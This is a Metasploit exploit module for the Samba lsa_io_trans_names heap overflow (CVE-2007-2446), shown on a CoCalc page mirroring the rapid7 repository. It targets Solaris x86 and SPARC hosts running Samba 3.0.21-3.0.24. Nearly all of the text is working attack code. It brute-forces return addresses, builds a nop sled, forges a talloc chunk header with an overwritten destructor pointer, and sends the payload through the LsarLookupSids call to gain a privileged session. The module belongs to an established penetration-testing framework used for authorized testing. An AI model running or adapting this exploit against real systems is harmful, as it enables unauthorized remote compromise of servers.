Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/samba/lsa_transnames_heap.rb
19721 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::DCERPC
10
include Msf::Exploit::Remote::SMB::Client
11
include Msf::Exploit::Brute
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
18
'Description' => %q{
19
This module triggers a heap overflow in the LSA RPC service
20
of the Samba daemon. This module uses the TALLOC chunk overwrite
21
method (credit Ramon and Adriano), which only works with Samba
22
versions 3.0.21-3.0.24. Additionally, this module will not work
23
when the Samba "log level" parameter is higher than "2".
24
},
25
'Author' => [
26
'Ramon de C Valle',
27
'Adriano Lima <adriano[at]risesecurity.org>',
28
'hdm'
29
],
30
'License' => MSF_LICENSE,
31
'References' => [
32
['CVE', '2007-2446'],
33
['OSVDB', '34699'],
34
],
35
'Privileged' => true,
36
'Payload' => {
37
'Space' => 1024
38
},
39
'Platform' => 'solaris',
40
'Targets' => [
41
[
42
'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
43
{
44
'Platform' => 'solaris',
45
'Arch' => [ ARCH_X86 ],
46
'Nops' => 64 * 1024,
47
'Bruteforce' =>
48
{
49
'Start' => { 'Ret' => 0x082f2000 },
50
'Stop' => { 'Ret' => 0x084f2000 },
51
'Step' => 60 * 1024
52
}
53
}
54
],
55
[
56
'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
57
{
58
'Platform' => 'solaris',
59
'Arch' => [ ARCH_SPARC ],
60
'Nops' => 64 * 1024,
61
'Bruteforce' =>
62
{
63
'Start' => { 'Ret' => 0x00322000 },
64
'Stop' => { 'Ret' => 0x00722000 },
65
'Step' => 60 * 1024
66
}
67
}
68
],
69
[
70
'DEBUG',
71
{
72
'Platform' => 'solaris',
73
'Arch' => [ ARCH_X86 ],
74
'Nops' => 64 * 1024,
75
'Bruteforce' =>
76
{
77
'Start' => { 'Ret' => 0xaabbccdd },
78
'Stop' => { 'Ret' => 0xaabbccdd },
79
'Step' => 60 * 1024
80
}
81
}
82
],
83
],
84
'DisclosureDate' => '2007-05-14',
85
'DefaultTarget' => 0,
86
'Notes' => {
87
'Stability' => [CRASH_SERVICE_RESTARTS],
88
'Reliability' => [REPEATABLE_SESSION],
89
'SideEffects' => [IOC_IN_LOGS]
90
}
91
)
92
)
93
94
register_options([
95
OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),
96
])
97
98
deregister_options('DCERPC::fake_bind_multi')
99
end
100
101
# Need to perform target detection
102
def autofilter
103
false
104
end
105
106
def brute_exploit(target_addrs)
107
if !@nops
108
if (target['Nops'] > 0)
109
print_status('Creating nop sled....')
110
@nops = make_nops(target['Nops'])
111
else
112
@nops = ''
113
end
114
end
115
116
print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])
117
118
nops = @nops
119
pipe = datastore['SMBPIPE'].downcase
120
121
print_status('Connecting to the SMB service...')
122
connect
123
smb_login
124
125
datastore['DCERPC::fake_bind_multi'] = false
126
127
handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
128
print_status("Binding to #{handle} ...")
129
dcerpc_bind(handle)
130
print_status("Bound to #{handle} ...")
131
132
num_entries = 272
133
num_entries2 = 288
134
135
#
136
# First talloc_chunk
137
# 16 bits align
138
# 16 bits sid_name_use
139
# 16 bits uni_str_len
140
# 16 bits uni_max_len
141
# 32 bits buffer
142
# 32 bits domain_idx
143
#
144
buf = (('A' * 16) * num_entries)
145
146
# Padding
147
buf << 'A' * 8
148
149
# TALLOC_MAGIC
150
talloc_magic = "\x70\xec\x14\xe8"
151
152
# Second talloc_chunk header
153
buf << 'A' * 8 # next, prev
154
buf << NDR.long(0) + NDR.long(0) # parent, child
155
buf << NDR.long(0) # refs
156
buf << [target_addrs['Ret']].pack('V') # destructor
157
buf << 'A' * 4 # name
158
buf << 'A' * 4 # size
159
buf << talloc_magic # flags
160
161
stub = lsa_open_policy(dcerpc)
162
163
stub << NDR.long(0) # num_entries
164
stub << NDR.long(0) # ptr_sid_enum
165
stub << NDR.long(num_entries) # num_entries
166
stub << NDR.long(0x20004) # ptr_trans_names
167
stub << NDR.long(num_entries2) # num_entries2
168
stub << buf
169
stub << nops
170
stub << payload.encoded
171
172
print_status('Calling the vulnerable function...')
173
174
begin
175
# LsarLookupSids
176
dcerpc.call(0x0f, stub)
177
rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
178
print_status('Server did not respond, this is expected')
179
rescue Rex::Proto::DCERPC::Exceptions::Fault
180
print_error('Server is most likely patched...')
181
rescue StandardError => e
182
if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
183
print_status('Server disconnected, this is expected')
184
else
185
print_error("Error: #{e.class}: #{e}")
186
end
187
end
188
189
handler
190
disconnect
191
end
192
193
def lsa_open_policy(dcerpc, server = '\\')
194
stubdata =
195
# Server
196
NDR.uwstring(server) +
197
# Object Attributes
198
NDR.long(24) + # SIZE
199
NDR.long(0) + # LSPTR
200
NDR.long(0) + # NAME
201
NDR.long(0) + # ATTRS
202
NDR.long(0) + # SEC DES
203
# LSA QOS PTR
204
NDR.long(1) + # Referent
205
NDR.long(12) + # Length
206
NDR.long(2) + # Impersonation
207
NDR.long(1) + # Context Tracking
208
NDR.long(0) + # Effective Only
209
# Access Mask
210
NDR.long(0x02000000)
211
212
dcerpc.call(6, stubdata)
213
214
dcerpc.last_response.stub_data[0, 20]
215
end
216
end
217
218